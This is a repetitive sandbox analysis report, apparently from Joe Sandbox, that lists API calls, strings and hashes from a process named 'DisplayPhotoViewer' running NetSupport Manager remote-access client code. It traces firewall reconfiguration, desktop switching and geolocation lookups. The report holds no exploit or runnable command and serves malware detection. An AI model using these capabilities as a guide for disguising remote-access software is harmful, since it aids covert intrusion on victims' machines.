                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableVisible$Foreground$CloseMessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                    • API String ID: 4194384052-3803836183
                                                                                                    • Opcode ID: cdfb1d8a132c5fa7e36ca89cf2780b25714b2c20742ef3bccfa00988e955d642
                                                                                                    • Instruction ID: 796e1be76f260c7223af6050a5c0908a884d4ced61f47f3172b169961d59ccc3
                                                                                                    • Opcode Fuzzy Hash: cdfb1d8a132c5fa7e36ca89cf2780b25714b2c20742ef3bccfa00988e955d642
                                                                                                    • Instruction Fuzzy Hash: EEC12575F512259BEB02CBE0DD81B6EF7E5AB8076DF014035E9199B28CEB31B904CB91
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,218EC38C,0B233858,0B233848,?,00000000,11177C6C,000000FF,?,1102FEA2,0B233858,00000000,?,?,?), ref: 110815C5
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 110815EB
                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 110815FF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11081613
                                                                                                    • wsprintfA.USER32 ref: 1108169B
                                                                                                    • wsprintfA.USER32 ref: 110816B2
                                                                                                    • wsprintfA.USER32 ref: 110816C9
                                                                                                    • CloseHandle.KERNEL32(00000000,110813F0,00000001,00000000), ref: 1108181A
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081218
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108122B
                                                                                                      • Part of subcall function 11081200: CloseHandle.KERNEL32(?,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 1108123E
                                                                                                      • Part of subcall function 11081200: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11081840,?,1102FEA2,0B233858,00000000,?,?,?), ref: 11081251
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                    • API String ID: 4263811268-2492245516
                                                                                                    • Opcode ID: a86fe57b31f10a8fd1f8a4d45fefc9f06f705ac6f315f6931de238201940bdc8
                                                                                                    • Instruction ID: b3fd1baa9725eb204d9f0143bf43b0deade306b2ca9ecd04b1689230d0725390
                                                                                                    • Opcode Fuzzy Hash: a86fe57b31f10a8fd1f8a4d45fefc9f06f705ac6f315f6931de238201940bdc8
                                                                                                    • Instruction Fuzzy Hash: 7F717CB5E04B09AFEB10DF799C45BDABBE4EF48354F10452AE95AD7280EB74A500CB90
                                                                                                    APIs
                                                                                                    • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102ECC4
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ECDD
                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 1102ED5A
                                                                                                    • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ED70
                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102ED9C
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDA9
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDB4
                                                                                                    • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EDBB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                    • Opcode ID: dc1754725cb1e1368e875043dcdd376bc8ac3effaa6304de6b3869b65dc2b543
                                                                                                    • Instruction ID: 8bf828858e54f3e7324610d0c835327b35d4a510447d5e332511462c8a2ed52c
                                                                                                    • Opcode Fuzzy Hash: dc1754725cb1e1368e875043dcdd376bc8ac3effaa6304de6b3869b65dc2b543
                                                                                                    • Instruction Fuzzy Hash: D7512974E403269BDB11DBB49C88B9EF7B4AF84708F4041ECE909A32C5EB706A44CF61
                                                                                                    APIs
                                                                                                      • Part of subcall function 111076C0: SetEvent.KERNEL32(00000000), ref: 111076E4
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102ADA5
                                                                                                    • GetTickCount.KERNEL32 ref: 1102ADCA
                                                                                                      • Part of subcall function 110C9870: __strdup.LIBCMT ref: 110C988A
                                                                                                    • GetTickCount.KERNEL32 ref: 1102AEC4
                                                                                                      • Part of subcall function 110CA4D0: wvsprintfA.USER32(?,?,?), ref: 110CA4FB
                                                                                                      • Part of subcall function 110C9920: _free.LIBCMT ref: 110C994D
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102AFBC
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102AFD8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                    • API String ID: 596640303-3003987893
                                                                                                    • Opcode ID: c6d6fabeb43193b491f3b7a3061ed14c4b03f5061ab7a825df25e08f525fb4ca
                                                                                                    • Instruction ID: 8d0d2c1425c45e78e3b72e7297f3295dbcb5bcdd9df4785f4c24d3c678d04338
                                                                                                    • Opcode Fuzzy Hash: c6d6fabeb43193b491f3b7a3061ed14c4b03f5061ab7a825df25e08f525fb4ca
                                                                                                    • Instruction Fuzzy Hash: 2F818F78E0060AEBDB05DBE4CC90FEEF7B5AF45708F508158E92567285EB34BA05CB61
                                                                                                    APIs
                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102C668,00000000,218EC38C,?,00000000,00000000), ref: 1102B794
                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102B7AA
                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102B7BE
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B7C5
                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102B7D6
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B7E6
                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102B832
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102B85F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                    • API String ID: 83693535-2077998243
APIs
• wsprintfA.USER32 ref: 1112AB30
• GetTickCount.KERNEL32 ref: 1112AB61
• SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112AB74
• GetTickCount.KERNEL32 ref: 1112AB7C
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: CountTick$FolderPathwsprintf
• String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
• API String ID: 1170620360-4157686185
APIs
• _strtok.LIBCMT ref: 11025976
• _strtok.LIBCMT ref: 110259B0
• Sleep.KERNEL32(1102E3C3,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11025AA4
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: _strtok$Sleep
• String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
• API String ID: 2009458258-3774545468
APIs
  • Part of subcall function 110849D0: UnhookWindowsHookEx.USER32(?), ref: 110849F3
• GetCurrentThreadId.KERNEL32 ref: 110FAEFC
• GetThreadDesktop.USER32(00000000), ref: 110FAF03
• OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FAF13
• SetThreadDesktop.USER32(00000000), ref: 110FAF20
• CloseDesktop.USER32(00000000), ref: 110FAF39
• GetLastError.KERNEL32 ref: 110FAF41
• CloseDesktop.USER32(00000000), ref: 110FAF57
• GetLastError.KERNEL32 ref: 110FAF5F
Strings
• SetThreadDesktop(%s) ok, xrefs: 110FAF2B
• SetThreadDesktop(%s) failed, e=%d, xrefs: 110FAF49
• OpenDesktop(%s) failed, e=%d, xrefs: 110FAF67
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
• String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
• API String ID: 2036220054-60805735
APIs
• GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 11153C38
• GetLastError.KERNEL32 ref: 11153C45
• wsprintfA.USER32 ref: 11153C58
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
  • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
• GlobalAddAtomA.KERNEL32(NSMReflect), ref: 11153C9C
• GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 11153CA9
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
• String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
• API String ID: 1734919802-1728070458
APIs
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
• std::exception::exception.LIBCMT ref: 111084AA
• __CxxThrowException@8.LIBCMT ref: 111084BF
• GetCurrentThreadId.KERNEL32 ref: 111084D6
• InitializeCriticalSection.KERNEL32(-00000010,?,1102F5F3,00000001,00000000), ref: 111084E9
• InitializeCriticalSection.KERNEL32(111E4480,?,1102F5F3,00000001,00000000), ref: 111084F8
• EnterCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 1110850C
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F5F3), ref: 11108532
• LeaveCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 111085BF
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
• String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
• API String ID: 1976012330-1024648535
APIs
  • Part of subcall function 1113B690: _memset.LIBCMT ref: 1113B6D5
  • Part of subcall function 1113B690: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1113B6EE
  • Part of subcall function 1113B690: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1113B715
  • Part of subcall function 1113B690: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1113B727
  • Part of subcall function 1113B690: FreeLibrary.KERNEL32(00000000), ref: 1113B73F
  • Part of subcall function 1113B690: GetSystemDefaultLangID.KERNEL32 ref: 1113B74A
• AdjustWindowRectEx.USER32(11137B17,00CE0000,00000001,00000030), ref: 1112C0D7
• LoadMenuA.USER32(00000000,000003EC), ref: 1112C0E8
• GetSystemMetrics.USER32(00000021), ref: 1112C0F9
• GetSystemMetrics.USER32(0000000F), ref: 1112C101
• GetSystemMetrics.USER32(00000004), ref: 1112C107
• GetDC.USER32(00000000), ref: 1112C113
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112C11E
• ReleaseDC.USER32(00000000,00000000), ref: 1112C127
• CreateWindowExA.USER32(?,NSMWClass,0B2206B0,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 1112C169
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceFreeLangMenuProcRectReleaseVersion_memset
                                                                                                    • String ID: NSMWClass
                                                                                                    • API String ID: 1971969616-4111455598
                                                                                                    • Opcode ID: f838903deaa1a77984b5b4697d66e756f1a06a96e7e200f3130f1ac7eed27a37
                                                                                                    • Instruction ID: 89fc7e3046bf32a80f81b556d9e5652573ca99749de3550d39160af8f35703aa
                                                                                                    • Opcode Fuzzy Hash: f838903deaa1a77984b5b4697d66e756f1a06a96e7e200f3130f1ac7eed27a37
                                                                                                    • Instruction Fuzzy Hash: 8F2191B6E00219AFDB10DFE5DC85FBEFBB8EB44704F514129FA15B7284D67069018BA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                      • Part of subcall function 11092230: CoInitialize.OLE32(00000000), ref: 11092244
                                                                                                      • Part of subcall function 11092230: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11092257
                                                                                                      • Part of subcall function 11092230: CoCreateInstance.OLE32(?,00000000,00000001,111B43AC,?), ref: 11092274
                                                                                                      • Part of subcall function 11092230: CoUninitialize.OLE32 ref: 11092292
                                                                                                    • _memset.LIBCMT ref: 1112F410
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,00000000), ref: 1112F426
                                                                                                    • _strrchr.LIBCMT ref: 1112F435
                                                                                                    • _free.LIBCMT ref: 1112F486
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig2 returned 0x%x
                                                                                                    • API String ID: 3753348462-81074719
                                                                                                    • Opcode ID: e690aa9ec7a31c6a29680381434577bc38a833d4a4f4ed4b3bda87aa3bf99424
                                                                                                    • Instruction ID: 76acea1aa7e8aeb936fd0a292d1960d3adc12920eccdbc76ad6f3b4bea007ab4
                                                                                                    • Opcode Fuzzy Hash: e690aa9ec7a31c6a29680381434577bc38a833d4a4f4ed4b3bda87aa3bf99424
                                                                                                    • Instruction Fuzzy Hash: 17212E79E0022A66DB60D7659C16FDFF7689F4570CF414599E908A71C0EEF0EA40CAE2
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                     • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                    • Opcode ID: fa9036cd773fd617bb4807dadab261007dc63d63d50ffa7a54c3dacae92d6917
                                                                                                    • Instruction ID: e00bc5454e7c870830340daf5ccac2ef1f50c6e3478ed7d58781a3eb56495a22
                                                                                                    • Opcode Fuzzy Hash: fa9036cd773fd617bb4807dadab261007dc63d63d50ffa7a54c3dacae92d6917
                                                                                                    • Instruction Fuzzy Hash: EB51AE76D1422A57D712CF24DC50BDEF7A8AF84319F1001A8EC99B72C4EB716A84CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • AutoICFConfig, xrefs: 111303D0
                                                                                                    • Client, xrefs: 111303D5
                                                                                                    • DoICFConfig() OK, xrefs: 11130456
                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113046C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
